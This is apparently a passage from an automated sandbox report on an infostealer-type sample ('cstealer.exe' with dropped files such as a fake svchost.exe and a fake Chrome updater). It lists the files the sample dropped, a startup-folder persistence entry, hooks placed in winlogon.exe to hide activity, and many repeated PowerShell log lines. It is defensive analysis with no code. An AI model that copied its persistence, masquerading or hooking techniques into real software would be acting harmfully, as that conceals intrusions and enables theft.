Source: C:\ProgramData\svchost.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-time-l1-1-0.dll
Source: C:\Users\user\AppData\Local\Temp\main.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI67202\libcrypto-1_1.dll
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeFile created: C:\ProgramData\setup.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\libcrypto-1_1.dllJump to dropped file
                                Source: C:\ProgramData\setup.exeFile created: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmpJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\pyexpat.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l2-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\libffi-7.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\libcrypto-1_1.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\setup.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\select.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\libffi-8.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\sqlite3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_ssl.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_brotli.cp310-win_amd64.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\VCRUNTIME140.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_bz2.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\python311.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\sqlite3.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_hashlib.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI11282\_socket.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_ctypes.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_decimal.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\sqlite3.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeFile created: C:\ProgramData\svchost.exeJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_hashlib.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\_ctypes.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\_queue.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\_ctypes.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\select.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_bz2.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\ucrtbase.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\unicodedata.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI77882\_queue.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_decimal.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_socket.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\libssl-1_1.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\libcrypto-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\libssl-1_1.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exeFile created: C:\ProgramData\main.exeJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\cryptography\hazmat\bindings\_rust.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\libssl-1_1.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pydJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\python311.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeFile created: C:\ProgramData\Microsoft\hacn.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI86682\select.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\libffi-8.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\_lzma.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI38562\unicodedata.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_ssl.pydJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\cstealer.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI53642\VCRUNTIME140.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\hacn.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI47682\libcrypto-1_1.dllJump to dropped file
                                Source: C:\ProgramData\Microsoft\based.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI14722\_lzma.pydJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-string-l1-1-0.dllJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\VCRUNTIME140.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeJump to dropped file
                                Source: C:\ProgramData\svchost.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI80762\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exeFile created: C:\ProgramData\Microsoft\based.exeJump to dropped file
Source: C:\ProgramData\Microsoft\based.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\? ??.scr

Hooking and other Techniques for Hiding and Protection

Source: C:\ProgramData\setup.exe | Module Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\WXYUBNJMNLAE.TMP
Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: winlogon.exe | IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: winlogon.exe | User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Users\user\AppData\Local\Temp\cstealer.exe | Code function: 3_2_00007FF6957E7100 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,3_2_00007FF6957E7100
Source: C:\Users\user\Desktop\DevxExecutor.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_MEI67202\Build.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\_MEI47682\s.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
